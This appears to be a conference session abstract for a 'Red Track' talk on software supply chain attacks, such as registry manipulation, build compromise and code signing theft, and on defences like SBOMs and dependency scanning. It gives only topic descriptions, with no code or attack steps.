The software supply chain has become prime territory for sophisticated attacks, as demonstrated by recent high-impact incidents like the 3CX compromise affecting 18 million users and the Okta breach impacting 150 organizations. This technical session explores how attackers exploit modern application dependencies, build processes, and distribution channels.
Through live demonstrations, we'll examine attack vectors including package registry manipulation, build system compromises, code signing certificate theft, and repository poisoning. We'll analyze real-world cases like the PyPI repository attacks and the Codecov breach to understand attacker methodologies and their cascading impacts across the development ecosystem.

Key areas covered:
1. Package registry exploitation techniques
2. Build pipeline compromise methods
3. Code signing infrastructure attacks
4. Repository poisoning strategies
5. SBOM implementation
6. Binary attestation systems
7. Automated dependency scanning
8. Secure build pipeline architecture

This Red Track presentation includes technical demonstrations of both attack techniques and defensive tooling. Attendees will gain practical knowledge in identifying vulnerable dependencies, implementing secure build processes, and establishing robust verification systems for their development infrastructure.
Perfect for offensive security researchers and defenders alike, you'll leave with actionable insights for securing your software supply chain against sophisticated attacks.